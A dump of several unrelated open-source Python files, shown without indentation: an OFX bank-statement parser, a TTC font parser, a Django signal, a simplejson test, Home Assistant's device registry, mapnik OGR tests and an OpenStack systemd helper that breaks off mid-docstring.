if uniqueid_tag and name_tag:
try:
ticker = ticker_tag.contents[0].strip()
except AttributeError:
# ticker can be empty
ticker = None
try:
memo = memo_tag.contents[0].strip()
except AttributeError:
# memo can be empty
memo = None
securityList.append(
Security(uniqueid_tag.contents[0].strip(),
name_tag.contents[0].strip(),
ticker,
memo))
return securityList
@classmethod
def parseInvestmentPosition(cls_, ofx):
position = Position()
tag = ofx.find('uniqueid')
if (hasattr(tag, 'contents')):
position.security = tag.contents[0].strip()
tag = ofx.find('units')
if (hasattr(tag, 'contents')):
position.units = decimal.Decimal(tag.contents[0].strip())
tag = ofx.find('unitprice')
if (hasattr(tag, 'contents')):
position.unit_price = decimal.Decimal(tag.contents[0].strip())
tag = ofx.find('dtpriceasof')
if (hasattr(tag, 'contents')):
try:
position.date = cls_.parseOfxDateTime(tag.contents[0].strip())
except ValueError:
raise
return position
@classmethod
def parseInvestmentTransaction(cls_, ofx):
transaction = InvestmentTransaction(ofx.name)
tag = ofx.find('fitid')
if (hasattr(tag, 'contents')):
transaction.id = tag.contents[0].strip()
tag = ofx.find('memo')
if (hasattr(tag, 'contents')):
transaction.memo = tag.contents[0].strip()
tag = ofx.find('dttrade')
if (hasattr(tag, 'contents')):
try:
transaction.tradeDate = cls_.parseOfxDateTime(
tag.contents[0].strip())
except ValueError:
raise
tag = ofx.find('dtsettle')
if (hasattr(tag, 'contents')):
try:
transaction.settleDate = cls_.parseOfxDateTime(
tag.contents[0].strip())
except ValueError:
raise
tag = ofx.find('uniqueid')
if (hasattr(tag, 'contents')):
transaction.security = tag.contents[0].strip()
tag = ofx.find('incometype')
if (hasattr(tag, 'contents')):
transaction.income_type = tag.contents[0].strip()
tag = ofx.find('units')
if (hasattr(tag, 'contents')):
transaction.units = decimal.Decimal(tag.contents[0].strip())
tag = ofx.find('unitprice')
if (hasattr(tag, 'contents')):
transaction.unit_price = decimal.Decimal(tag.contents[0].strip())
tag = ofx.find('commission')
if (hasattr(tag, 'contents')):
transaction.commission = decimal.Decimal(tag.contents[0].strip())
tag = ofx.find('fees')
if (hasattr(tag, 'contents')):
transaction.fees = decimal.Decimal(tag.contents[0].strip())
tag = ofx.find('total')
if (hasattr(tag, 'contents')):
transaction.total = decimal.Decimal(tag.contents[0].strip())
return transaction
@classmethod
def parseInvestmentStatement(cls_, invstmtrs_ofx):
statement = InvestmentStatement()
currency_tag = invstmtrs_ofx.find('curdef')
if hasattr(currency_tag, "contents"):
statement.currency = currency_tag.contents[0].strip().lower()
invtranlist_ofx = invstmtrs_ofx.find('invtranlist')
if (invtranlist_ofx is not None):
tag = invtranlist_ofx.find('dtstart')
if (hasattr(tag, 'contents')):
try:
statement.start_date = cls_.parseOfxDateTime(
tag.contents[0].strip())
except IndexError:
statement.warnings.append(six.u('Empty start date.'))
if cls_.fail_fast:
raise
except ValueError:
e = sys.exc_info()[1]
statement.warnings.append(six.u('Invalid start date: %s') % e)
if cls_.fail_fast:
raise
tag = invtranlist_ofx.find('dtend')
if (hasattr(tag, 'contents')):
try:
statement.end_date = cls_.parseOfxDateTime(
tag.contents[0].strip())
except IndexError:
statement.warnings.append(six.u('Empty end date.'))
except ValueError:
e = sys.exc_info()[1]
statement.warnings.append(six.u('Invalid end date: %s') % e)
if cls_.fail_fast:
raise
for transaction_type in ['posmf', 'posstock', 'posopt']:
try:
for investment_ofx in invstmtrs_ofx.findAll(transaction_type):
statement.positions.append(
cls_.parseInvestmentPosition(investment_ofx))
except (ValueError, IndexError, decimal.InvalidOperation,
TypeError):
e = sys.exc_info()[1]
if cls_.fail_fast:
raise
statement.discarded_entries.append(
{six.u('error'): six.u("Error parsing positions: ") + str(e),
six.u('content'): investment_ofx}
)
for transaction_type in ['buymf', 'sellmf', 'reinvest', 'buystock',
'sellstock', 'income', 'buyopt', 'sellopt']:
try:
for investment_ofx in invstmtrs_ofx.findAll(transaction_type):
statement.transactions.append(
cls_.parseInvestmentTransaction(investment_ofx))
except (ValueError, IndexError, decimal.InvalidOperation):
e = sys.exc_info()[1]
if cls_.fail_fast:
raise
statement.discarded_entries.append(
{six.u('error'): transaction_type + ": " + str(e),
six.u('content'): investment_ofx}
)
return statement
@classmethod
def parseOrg(cls_, fi_ofx):
institution = Institution()
org = fi_ofx.find('org')
if hasattr(org, 'contents'):
institution.organization = org.contents[0].strip()
fid = fi_ofx.find('fid')
if hasattr(fid, 'contents'):
institution.fid = fid.contents[0].strip()
return institution
@classmethod
def parseSonrs(cls_, sonrs):
items = [
'code',
'severity',
'dtserver',
'language',
'dtprofup',
'org',
'fid',
'intu.bid',
'message'
]
idict = {}
for i in items:
try:
idict[i] = sonrs.find(i).contents[0].strip()
except:
idict[i] = None
idict['code'] = int(idict['code'])
if idict['message'] is None:
idict['message'] = ''
return Signon(idict)
@classmethod
def parseStmtrs(cls_, stmtrs_list, accountType):
''' Parse the <STMTRS> tags and return a list of Accounts object. '''
ret = []
for stmtrs_ofx in stmtrs_list:
account = Account()
act_curdef = stmtrs_ofx.find('curdef')
if act_curdef:
account.curdef = act_curdef.contents[0].strip()
acctid_tag = stmtrs_ofx.find('acctid')
if hasattr(acctid_tag, 'contents'):
account.account_id = acctid_tag.contents[0].strip()
bankid_tag = stmtrs_ofx.find('bankid')
if hasattr(bankid_tag, 'contents'):
account.routing_number = bankid_tag.contents[0].strip()
branchid_tag = stmtrs_ofx.find('branchid')
if hasattr(branchid_tag, 'contents'):
account.branch_id = branchid_tag.contents[0].strip()
type_tag = stmtrs_ofx.find('accttype')
if hasattr(type_tag, 'contents'):
account.account_type = type_tag.contents[0].strip()
account.type = accountType
if stmtrs_ofx:
account.statement = cls_.parseStatement(stmtrs_ofx)
ret.append(account)
return ret
@classmethod
def parseBalance(cls_, statement, stmt_ofx, bal_tag_name, bal_attr, bal_date_attr, bal_type_string):
bal_tag = stmt_ofx.find(bal_tag_name)
if hasattr(bal_tag, "contents"):
balamt_tag = bal_tag.find('balamt')
dtasof_tag = bal_tag.find('dtasof')
if hasattr(balamt_tag, "contents"):
try:
setattr(statement, bal_attr, decimal.Decimal(
balamt_tag.contents[0].strip()))
except (IndexError, decimal.InvalidOperation):
ex = sys.exc_info()[1]
statement.warnings.append(
six.u("%s balance amount was empty for %s") % (bal_type_string, stmt_ofx))
if cls_.fail_fast:
raise OfxParserException("Empty %s balance" % bal_type_string)
if hasattr(dtasof_tag, "contents"):
try:
setattr(statement, bal_date_attr, cls_.parseOfxDateTime(
dtasof_tag.contents[0].strip()))
except IndexError:
statement.warnings.append(
six.u("%s balance date was empty for %s") % (bal_type_string, stmt_ofx))
if cls_.fail_fast:
raise
except ValueError:
statement.warnings.append(
six.u("%s balance date was not allowed for %s") % (bal_type_string, stmt_ofx))
if cls_.fail_fast:
raise
@classmethod
def parseStatement(cls_, stmt_ofx):
'''
Parse a statement in ofx-land and return a Statement object.
'''
statement = Statement()
dtstart_tag = stmt_ofx.find('dtstart')
if hasattr(dtstart_tag, "contents"):
try:
statement.start_date = cls_.parseOfxDateTime(
dtstart_tag.contents[0].strip())
except IndexError:
statement.warnings.append(
six.u("Statement start date was empty for %s") % stmt_ofx)
if cls_.fail_fast:
raise
except ValueError:
statement.warnings.append(
six.u("Statement start date was not allowed for %s") % stmt_ofx)
if cls_.fail_fast:
raise
dtend_tag = stmt_ofx.find('dtend')
if hasattr(dtend_tag, "contents"):
try:
statement.end_date = cls_.parseOfxDateTime(
dtend_tag.contents[0].strip())
except IndexError:
statement.warnings.append(
six.u("Statement start date was empty for %s") % stmt_ofx)
if cls_.fail_fast:
raise
except ValueError:
ve = sys.exc_info()[1]
msg = six.u("Statement start date was not formatted "
"correctly for %s")
statement.warnings.append(msg % stmt_ofx)
if cls_.fail_fast:
raise
except TypeError:
statement.warnings.append(
six.u("Statement start date was not allowed for %s") % stmt_ofx)
if cls_.fail_fast:
raise
currency_tag = stmt_ofx.find('curdef')
if hasattr(currency_tag, "contents"):
try:
statement.currency = currency_tag.contents[0].strip().lower()
except IndexError:
statement.warnings.append(
six.u("Currency definition was empty for %s") % stmt_ofx)
if cls_.fail_fast:
raise
cls_.parseBalance(statement, stmt_ofx, 'ledgerbal', 'balance', 'balance_date', 'ledger')
cls_.parseBalance(statement, stmt_ofx, 'availbal', 'available_balance', 'available_balance_date', 'ledger')
for transaction_ofx in stmt_ofx.findAll('stmttrn'):
try:
statement.transactions.append(
cls_.parseTransaction(transaction_ofx))
except OfxParserException:
ofxError = sys.exc_info()[1]
statement.discarded_entries.append(
{'error': str(ofxError), 'content': transaction_ofx})
if cls_.fail_fast:
raise
return statement
@classmethod
def parseTransaction(cls_, txn_ofx):
'''
Parse a transaction in ofx-land and return a Transaction object.
'''
transaction = Transaction()
type_tag = txn_ofx.find('trntype')
if hasattr(type_tag, 'contents'):
try:
transaction.type = type_tag.contents[0].lower().strip()
except IndexError:
raise OfxParserException(six.u("Empty transaction type"))
except TypeError:
raise OfxParserException(
six.u("No Transaction type (a required field)"))
name_tag = txn_ofx.find('name')
if hasattr(name_tag, "contents"):
try:
transaction.payee = name_tag.contents[0].strip()
except IndexError:
raise OfxParserException(six.u("Empty transaction name"))
except TypeError:
raise OfxParserException(
six.u("No Transaction name (a required field)"))
memo_tag = txn_ofx.find('memo')
if hasattr(memo_tag, "contents"):
try:
transaction.memo = memo_tag.contents[0].strip()
except IndexError:
# Memo can be empty.
pass
except TypeError:
pass
amt_tag = txn_ofx.find('trnamt')
if hasattr(amt_tag, "contents"):
try:
transaction.amount = decimal.Decimal(
amt_tag.contents[0].strip())
except IndexError:
raise OfxParserException("Invalid Transaction Date")
except decimal.InvalidOperation:
raise OfxParserException(
six.u("Invalid Transaction Amount: '%s'") % amt_tag.contents[0])
except TypeError:
raise OfxParserException(
six.u("No Transaction Amount (a required field)"))
else:
raise OfxParserException(
six.u("Missing Transaction Amount (a required field)"))
date_tag = txn_ofx.find('dtposted')
if hasattr(date_tag, "contents"):
try:
transaction.date = cls_.parseOfxDateTime(
date_tag.contents[0].strip())
except IndexError:
raise OfxParserException("Invalid Transaction Date")
except ValueError:
ve = sys.exc_info()[1]
raise OfxParserException(str(ve))
except TypeError:
raise OfxParserException(
six.u("No Transaction Date (a required field)"))
else:
raise OfxParserException(
six.u("Missing Transaction Date (a required field)"))
id_tag = txn_ofx.find('fitid')
if hasattr(id_tag, "contents"):
try:
transaction.id = id_tag.contents[0].strip()
except IndexError:
raise OfxParserException(six.u("Empty FIT id (a required field)"))
except TypeError:
raise OfxParserException(six.u("No FIT id (a required field)"))
else:
raise OfxParserException(six.u("Missing FIT id (a required field)"))
sic_tag = txn_ofx.find('sic')
if hasattr(sic_tag, 'contents'):
try:
transaction.sic = sic_tag.contents[0].strip()
except IndexError:
raise OfxParserException(six.u("Empty transaction Standard Industry Code (SIC)"))
if transaction.sic is not None and transaction.sic in mcc.codes:
try:
transaction.mcc = mcc.codes.get(transaction.sic, '').get('combined description')
except IndexError:
raise OfxParserException(six.u("Empty transaction Merchant Category Code (MCC)"))
except AttributeError:
if cls._fail_fast:
raise
checknum_tag = txn_ofx.find('checknum')
if hasattr(checknum_tag, 'contents'):
try:
transaction.checknum = checknum_tag.contents[0].strip()
except IndexError:
raise OfxParserException(six.u("Empty Check (or other reference) number"))
return transaction
|
tp7/assfc
|
refs/heads/master
|
font_loader/ttc_parser.py
|
1
|
from collections import namedtuple
import logging
import struct
from font_loader.ttf_parser import TTFFont
TTCHeader = namedtuple('TTCHeader', ['tag','version','num_fonts'])
class TTCFont(object):
def __init__(self, path):
self.__info = []
self.parse(path)
def parse(self, path):
with open(path,'rb') as file:
data = struct.unpack('>4sIL', file.read(12))
ttc_header = TTCHeader(data[0].decode('ascii'),data[1],data[2])
if ttc_header.tag != 'ttcf':
return
ttf_offsets = []
for i in range(ttc_header.num_fonts):
ttf_offsets.append(struct.unpack('>I',file.read(4))[0])
for offset in ttf_offsets:
ttf_font = TTFFont(path, offset)
self.__info.append(ttf_font.get_info())
def get_infos(self):
return self.__info
|
moreati/django-userena
|
refs/heads/master
|
userena/contrib/umessages/signals.py
|
23
|
from django.dispatch import Signal
email_sent = Signal(providing_args=["msg"])
|
TinajaLabs/makerfaire2015
|
refs/heads/master
|
SensorGateway/home/tinaja/downloads/simplejson-2.6.1/simplejson/tests/test_speedups.py
|
129
|
from unittest import TestCase
from simplejson import encoder, scanner
def has_speedups():
return encoder.c_make_encoder is not None
class TestDecode(TestCase):
def test_make_scanner(self):
if not has_speedups():
return
self.assertRaises(AttributeError, scanner.c_make_scanner, 1)
def test_make_encoder(self):
if not has_speedups():
return
self.assertRaises(TypeError, encoder.c_make_encoder,
None,
"\xCD\x7D\x3D\x4E\x12\x4C\xF9\x79\xD7\x52\xBA\x82\xF2\x27\x4A\x7D\xA0\xCA\x75",
None)
|
molobrakos/home-assistant
|
refs/heads/master
|
homeassistant/helpers/device_registry.py
|
4
|
"""Provide a way to connect entities belonging to one device."""
import logging
import uuid
from asyncio import Event
from collections import OrderedDict
from typing import List, Optional, cast
import attr
from homeassistant.core import callback
from homeassistant.loader import bind_hass
from .typing import HomeAssistantType
_LOGGER = logging.getLogger(__name__)
_UNDEF = object()
DATA_REGISTRY = 'device_registry'
STORAGE_KEY = 'core.device_registry'
STORAGE_VERSION = 1
SAVE_DELAY = 10
CONNECTION_NETWORK_MAC = 'mac'
CONNECTION_UPNP = 'upnp'
CONNECTION_ZIGBEE = 'zigbee'
@attr.s(slots=True, frozen=True)
class DeviceEntry:
"""Device Registry Entry."""
config_entries = attr.ib(type=set, converter=set,
default=attr.Factory(set))
connections = attr.ib(type=set, converter=set, default=attr.Factory(set))
identifiers = attr.ib(type=set, converter=set, default=attr.Factory(set))
manufacturer = attr.ib(type=str, default=None)
model = attr.ib(type=str, default=None)
name = attr.ib(type=str, default=None)
sw_version = attr.ib(type=str, default=None)
hub_device_id = attr.ib(type=str, default=None)
area_id = attr.ib(type=str, default=None)
name_by_user = attr.ib(type=str, default=None)
id = attr.ib(type=str, default=attr.Factory(lambda: uuid.uuid4().hex))
def format_mac(mac):
"""Format the mac address string for entry into dev reg."""
to_test = mac
if len(to_test) == 17 and to_test.count(':') == 5:
return to_test.lower()
if len(to_test) == 17 and to_test.count('-') == 5:
to_test = to_test.replace('-', '')
elif len(to_test) == 14 and to_test.count('.') == 2:
to_test = to_test.replace('.', '')
if len(to_test) == 12:
# no : included
return ':'.join(to_test.lower()[i:i + 2] for i in range(0, 12, 2))
# Not sure how formatted, return original
return mac
class DeviceRegistry:
"""Class to hold a registry of devices."""
def __init__(self, hass):
"""Initialize the device registry."""
self.hass = hass
self.devices = None
self._store = hass.helpers.storage.Store(STORAGE_VERSION, STORAGE_KEY)
@callback
def async_get(self, device_id: str) -> Optional[DeviceEntry]:
"""Get device."""
return self.devices.get(device_id)
@callback
def async_get_device(self, identifiers: set, connections: set):
"""Check if device is registered."""
for device in self.devices.values():
if any(iden in device.identifiers for iden in identifiers) or \
any(conn in device.connections for conn in connections):
return device
return None
@callback
def async_get_or_create(self, *, config_entry_id, connections=None,
identifiers=None, manufacturer=_UNDEF,
model=_UNDEF, name=_UNDEF, sw_version=_UNDEF,
via_hub=None):
"""Get device. Create if it doesn't exist."""
if not identifiers and not connections:
return None
if identifiers is None:
identifiers = set()
if connections is None:
connections = set()
connections = {
(key, format_mac(value)) if key == CONNECTION_NETWORK_MAC
else (key, value)
for key, value in connections
}
device = self.async_get_device(identifiers, connections)
if device is None:
device = DeviceEntry()
self.devices[device.id] = device
if via_hub is not None:
hub_device = self.async_get_device({via_hub}, set())
hub_device_id = hub_device.id if hub_device else _UNDEF
else:
hub_device_id = _UNDEF
return self._async_update_device(
device.id,
add_config_entry_id=config_entry_id,
hub_device_id=hub_device_id,
merge_connections=connections or _UNDEF,
merge_identifiers=identifiers or _UNDEF,
manufacturer=manufacturer,
model=model,
name=name,
sw_version=sw_version
)
@callback
def async_update_device(
self, device_id, *, area_id=_UNDEF, name_by_user=_UNDEF):
"""Update properties of a device."""
return self._async_update_device(
device_id, area_id=area_id, name_by_user=name_by_user)
@callback
def _async_update_device(self, device_id, *, add_config_entry_id=_UNDEF,
remove_config_entry_id=_UNDEF,
merge_connections=_UNDEF,
merge_identifiers=_UNDEF,
manufacturer=_UNDEF,
model=_UNDEF,
name=_UNDEF,
sw_version=_UNDEF,
hub_device_id=_UNDEF,
area_id=_UNDEF,
name_by_user=_UNDEF):
"""Update device attributes."""
old = self.devices[device_id]
changes = {}
config_entries = old.config_entries
if (add_config_entry_id is not _UNDEF and
add_config_entry_id not in old.config_entries):
config_entries = old.config_entries | {add_config_entry_id}
if (remove_config_entry_id is not _UNDEF and
remove_config_entry_id in config_entries):
config_entries = config_entries - {remove_config_entry_id}
if config_entries is not old.config_entries:
changes['config_entries'] = config_entries
for attr_name, value in (
('connections', merge_connections),
('identifiers', merge_identifiers),
):
old_value = getattr(old, attr_name)
# If not undefined, check if `value` contains new items.
if value is not _UNDEF and not value.issubset(old_value):
changes[attr_name] = old_value | value
for attr_name, value in (
('manufacturer', manufacturer),
('model', model),
('name', name),
('sw_version', sw_version),
('hub_device_id', hub_device_id),
):
if value is not _UNDEF and value != getattr(old, attr_name):
changes[attr_name] = value
if (area_id is not _UNDEF and area_id != old.area_id):
changes['area_id'] = area_id
if (name_by_user is not _UNDEF and
name_by_user != old.name_by_user):
changes['name_by_user'] = name_by_user
if not changes:
return old
new = self.devices[device_id] = attr.evolve(old, **changes)
self.async_schedule_save()
return new
async def async_load(self):
"""Load the device registry."""
data = await self._store.async_load()
devices = OrderedDict()
if data is not None:
for device in data['devices']:
devices[device['id']] = DeviceEntry(
config_entries=set(device['config_entries']),
connections={tuple(conn) for conn
in device['connections']},
identifiers={tuple(iden) for iden
in device['identifiers']},
manufacturer=device['manufacturer'],
model=device['model'],
name=device['name'],
sw_version=device['sw_version'],
id=device['id'],
# Introduced in 0.79
hub_device_id=device.get('hub_device_id'),
# Introduced in 0.87
area_id=device.get('area_id'),
name_by_user=device.get('name_by_user')
)
self.devices = devices
@callback
def async_schedule_save(self):
"""Schedule saving the device registry."""
self._store.async_delay_save(self._data_to_save, SAVE_DELAY)
@callback
def _data_to_save(self):
"""Return data of device registry to store in a file."""
data = {}
data['devices'] = [
{
'config_entries': list(entry.config_entries),
'connections': list(entry.connections),
'identifiers': list(entry.identifiers),
'manufacturer': entry.manufacturer,
'model': entry.model,
'name': entry.name,
'sw_version': entry.sw_version,
'id': entry.id,
'hub_device_id': entry.hub_device_id,
'area_id': entry.area_id,
'name_by_user': entry.name_by_user
} for entry in self.devices.values()
]
return data
@callback
def async_clear_config_entry(self, config_entry_id):
"""Clear config entry from registry entries."""
for dev_id, device in self.devices.items():
if config_entry_id in device.config_entries:
self._async_update_device(
dev_id, remove_config_entry_id=config_entry_id)
@callback
def async_clear_area_id(self, area_id: str) -> None:
"""Clear area id from registry entries."""
for dev_id, device in self.devices.items():
if area_id == device.area_id:
self._async_update_device(dev_id, area_id=None)
@bind_hass
async def async_get_registry(hass: HomeAssistantType) -> DeviceRegistry:
"""Return device registry instance."""
reg_or_evt = hass.data.get(DATA_REGISTRY)
if not reg_or_evt:
evt = hass.data[DATA_REGISTRY] = Event()
reg = DeviceRegistry(hass)
await reg.async_load()
hass.data[DATA_REGISTRY] = reg
evt.set()
return reg
if isinstance(reg_or_evt, Event):
evt = reg_or_evt
await evt.wait()
return cast(DeviceRegistry, hass.data.get(DATA_REGISTRY))
return cast(DeviceRegistry, reg_or_evt)
@callback
def async_entries_for_area(registry: DeviceRegistry, area_id: str) \
-> List[DeviceEntry]:
"""Return entries that match an area."""
return [device for device in registry.devices.values()
if device.area_id == area_id]
|
yohanboniface/python-mapnik
|
refs/heads/master
|
test/python_tests/ogr_test.py
|
3
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
from nose.tools import assert_almost_equal, eq_, raises
import mapnik
from .utilities import execution_path, run_all
try:
import json
except ImportError:
import simplejson as json
def setup():
# All of the paths used are relative, if we run the tests
# from another directory we need to chdir()
os.chdir(execution_path('.'))
if 'ogr' in mapnik.DatasourceCache.plugin_names():
# Shapefile initialization
def test_shapefile_init():
ds = mapnik.Ogr(file='../data/shp/boundaries.shp', layer_by_index=0)
e = ds.envelope()
assert_almost_equal(e.minx, -11121.6896651, places=7)
assert_almost_equal(e.miny, -724724.216526, places=6)
assert_almost_equal(e.maxx, 2463000.67866, places=5)
assert_almost_equal(e.maxy, 1649661.267, places=3)
meta = ds.describe()
eq_(meta['geometry_type'], mapnik.DataGeometryType.Polygon)
eq_('+proj=lcc' in meta['proj4'], True)
# Shapefile properties
def test_shapefile_properties():
ds = mapnik.Ogr(file='../data/shp/boundaries.shp', layer_by_index=0)
f = ds.features_at_point(ds.envelope().center(), 0.001).features[0]
eq_(ds.geometry_type(), mapnik.DataGeometryType.Polygon)
eq_(f['CGNS_FID'], u'6f733341ba2011d892e2080020a0f4c9')
eq_(f['COUNTRY'], u'CAN')
eq_(f['F_CODE'], u'FA001')
eq_(f['NAME_EN'], u'Quebec')
eq_(f['Shape_Area'], 1512185733150.0)
eq_(f['Shape_Leng'], 19218883.724300001)
meta = ds.describe()
eq_(meta['geometry_type'], mapnik.DataGeometryType.Polygon)
# NOTE: encoding is latin1 but gdal >= 1.9 should now expose utf8 encoded features
# See SHAPE_ENCODING for overriding: http://gdal.org/ogr/drv_shapefile.html
# Failure for the NOM_FR field is expected for older gdal
#eq_(f['NOM_FR'], u'Qu\xe9bec')
#eq_(f['NOM_FR'], u'Québec')
@raises(RuntimeError)
def test_that_nonexistant_query_field_throws(**kwargs):
ds = mapnik.Ogr(file='../data/shp/world_merc.shp', layer_by_index=0)
eq_(len(ds.fields()), 11)
eq_(ds.fields(), ['FIPS', 'ISO2', 'ISO3', 'UN', 'NAME',
'AREA', 'POP2005', 'REGION', 'SUBREGION', 'LON', 'LAT'])
eq_(ds.field_types(),
['str',
'str',
'str',
'int',
'str',
'int',
'int',
'int',
'int',
'float',
'float'])
query = mapnik.Query(ds.envelope())
for fld in ds.fields():
query.add_property_name(fld)
# also add an invalid one, triggering throw
query.add_property_name('bogus')
ds.features(query)
# disabled because OGR prints an annoying error: ERROR 1: Invalid Point object. Missing 'coordinates' member.
# def test_handling_of_null_features():
# ds = mapnik.Ogr(file='../data/json/null_feature.geojson',layer_by_index=0)
# fs = ds.all_features()
# eq_(len(fs),1)
# OGR plugin extent parameter
def test_ogr_extent_parameter():
ds = mapnik.Ogr(
file='../data/shp/world_merc.shp',
layer_by_index=0,
extent='-1,-1,1,1')
e = ds.envelope()
eq_(e.minx, -1)
eq_(e.miny, -1)
eq_(e.maxx, 1)
eq_(e.maxy, 1)
meta = ds.describe()
eq_(meta['geometry_type'], mapnik.DataGeometryType.Polygon)
eq_('+proj=merc' in meta['proj4'], True)
def test_ogr_reading_gpx_waypoint():
ds = mapnik.Ogr(file='../data/gpx/empty.gpx', layer='waypoints')
e = ds.envelope()
eq_(e.minx, -122)
eq_(e.miny, 48)
eq_(e.maxx, -122)
eq_(e.maxy, 48)
meta = ds.describe()
eq_(meta['geometry_type'], mapnik.DataGeometryType.Point)
eq_('+proj=longlat' in meta['proj4'], True)
def test_ogr_empty_data_should_not_throw():
default_logging_severity = mapnik.logger.get_severity()
mapnik.logger.set_severity(getattr(mapnik.severity_type, "None"))
# use logger to silence expected warnings
for layer in ['routes', 'tracks', 'route_points', 'track_points']:
ds = mapnik.Ogr(file='../data/gpx/empty.gpx', layer=layer)
e = ds.envelope()
eq_(e.minx, 0)
eq_(e.miny, 0)
eq_(e.maxx, 0)
eq_(e.maxy, 0)
mapnik.logger.set_severity(default_logging_severity)
meta = ds.describe()
eq_(meta['geometry_type'], mapnik.DataGeometryType.Point)
eq_('+proj=longlat' in meta['proj4'], True)
# disabled because OGR prints an annoying error: ERROR 1: Invalid Point object. Missing 'coordinates' member.
# def test_handling_of_null_features():
# ds = mapnik.Ogr(file='../data/json/null_feature.geojson',layer_by_index=0)
# fs = ds.all_features()
# eq_(len(fs),1)
def test_geometry_type():
ds = mapnik.Ogr(file='../data/csv/wkt.csv', layer_by_index=0)
e = ds.envelope()
assert_almost_equal(e.minx, 1.0, places=1)
assert_almost_equal(e.miny, 1.0, places=1)
assert_almost_equal(e.maxx, 45.0, places=1)
assert_almost_equal(e.maxy, 45.0, places=1)
meta = ds.describe()
eq_(meta['geometry_type'], mapnik.DataGeometryType.Point)
#eq_('+proj=longlat' in meta['proj4'],True)
fs = ds.featureset()
feat = fs.next()
actual = json.loads(feat.to_geojson())
eq_(actual,
{u'geometry': {u'type': u'Point',
u'coordinates': [30,
10]},
u'type': u'Feature',
u'id': 2,
u'properties': {u'type': u'point',
u'WKT': u' POINT (30 10)'}})
feat = fs.next()
actual = json.loads(feat.to_geojson())
eq_(actual,
{u'geometry': {u'type': u'LineString',
u'coordinates': [[30,
10],
[10,
30],
[40,
40]]},
u'type': u'Feature',
u'id': 3,
u'properties': {u'type': u'linestring',
u'WKT': u' LINESTRING (30 10, 10 30, 40 40)'}})
feat = fs.next()
actual = json.loads(feat.to_geojson())
eq_(actual,
{u'geometry': {u'type': u'Polygon',
u'coordinates': [[[30,
10],
[40,
40],
[20,
40],
[10,
20],
[30,
10]]]},
u'type': u'Feature',
u'id': 4,
u'properties': {u'type': u'polygon',
u'WKT': u' POLYGON ((30 10, 10 20, 20 40, 40 40, 30 10))'}})
feat = fs.next()
actual = json.loads(feat.to_geojson())
eq_(
actual, {
u'geometry': {
u'type': u'Polygon', u'coordinates': [
[
[
35, 10], [
45, 45], [
15, 40], [
10, 20], [
35, 10]], [
[
20, 30], [
35, 35], [
30, 20], [
20, 30]]]}, u'type': u'Feature', u'id': 5, u'properties': {
u'type': u'polygon', u'WKT': u' POLYGON ((35 10, 10 20, 15 40, 45 45, 35 10),(20 30, 35 35, 30 20, 20 30))'}})
feat = fs.next()
actual = json.loads(feat.to_geojson())
eq_(actual,
{u'geometry': {u'type': u'MultiPoint',
u'coordinates': [[10,
40],
[40,
30],
[20,
20],
[30,
10]]},
u'type': u'Feature',
u'id': 6,
u'properties': {u'type': u'multipoint',
u'WKT': u' MULTIPOINT ((10 40), (40 30), (20 20), (30 10))'}})
feat = fs.next()
actual = json.loads(feat.to_geojson())
eq_(actual,
{u'geometry': {u'type': u'MultiLineString',
u'coordinates': [[[10,
10],
[20,
20],
[10,
40]],
[[40,
40],
[30,
30],
[40,
20],
[30,
10]]]},
u'type': u'Feature',
u'id': 7,
u'properties': {u'type': u'multilinestring',
u'WKT': u' MULTILINESTRING ((10 10, 20 20, 10 40),(40 40, 30 30, 40 20, 30 10))'}})
feat = fs.next()
actual = json.loads(feat.to_geojson())
eq_(actual,
{u'geometry': {u'type': u'MultiPolygon',
u'coordinates': [[[[30,
20],
[45,
40],
[10,
40],
[30,
20]]],
[[[15,
5],
[40,
10],
[10,
20],
[5,
10],
[15,
5]]]]},
u'type': u'Feature',
u'id': 8,
u'properties': {u'type': u'multipolygon',
u'WKT': u' MULTIPOLYGON (((30 20, 10 40, 45 40, 30 20)),((15 5, 40 10, 10 20, 5 10, 15 5)))'}})
feat = fs.next()
actual = json.loads(feat.to_geojson())
eq_(actual, {u'geometry': {u'type': u'MultiPolygon', u'coordinates': [[[[40, 40], [20, 45], [45, 30], [40, 40]]], [[[20, 35], [10, 30], [10, 10], [30, 5], [45, 20], [20, 35]], [[30, 20], [20, 15], [20, 25], [
30, 20]]]]}, u'type': u'Feature', u'id': 9, u'properties': {u'type': u'multipolygon', u'WKT': u' MULTIPOLYGON (((40 40, 20 45, 45 30, 40 40)),((20 35, 45 20, 30 5, 10 10, 10 30, 20 35),(30 20, 20 25, 20 15, 30 20)))'}})
feat = fs.next()
actual = json.loads(feat.to_geojson())
eq_(actual,
{u'geometry': {u'type': u'GeometryCollection',
u'geometries': [{u'type': u'Polygon',
u'coordinates': [[[1,
1],
[2,
1],
[2,
2],
[1,
2],
[1,
1]]]},
{u'type': u'Point',
u'coordinates': [2,
3]},
{u'type': u'LineString',
u'coordinates': [[2,
3],
[3,
4]]}]},
u'type': u'Feature',
u'id': 10,
u'properties': {u'type': u'collection',
u'WKT': u' GEOMETRYCOLLECTION(POLYGON((1 1,2 1,2 2,1 2,1 1)),POINT(2 3),LINESTRING(2 3,3 4))'}})
if __name__ == "__main__":
setup()
exit(run_all(eval(x) for x in dir() if x.startswith("test_")))
|
miyakz1192/neutron
|
refs/heads/master
|
neutron/openstack/common/systemd.py
|
101
|
# Copyright 2012-2014 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Helper module for systemd service readiness notification.
"""
import logging
import os
import socket
import sys
LOG = logging.getLogger(__name__)
def _abstractify(socket_name):
if socket_name.startswith('@'):
# abstract namespace socket
socket_name = '\0%s' % socket_name[1:]
return socket_name
def _sd_notify(unset_env, msg):
notify_socket = os.getenv('NOTIFY_SOCKET')
if notify_socket:
sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
try:
sock.connect(_abstractify(notify_socket))
sock.sendall(msg)
if unset_env:
del os.environ['NOTIFY_SOCKET']
except EnvironmentError:
LOG.debug("Systemd notification failed", exc_info=True)
finally:
sock.close()
def notify():
"""Send notification to Systemd that service is ready.
For details see
http://www.freedesktop.org/software/systemd/man/sd_notify.html
"""
_sd_notify(False, 'READY=1')
def notify_once():
"""Send notification once to Systemd that service is ready.
Systemd sets NOTIFY_SOCKET environment variable with the name of the
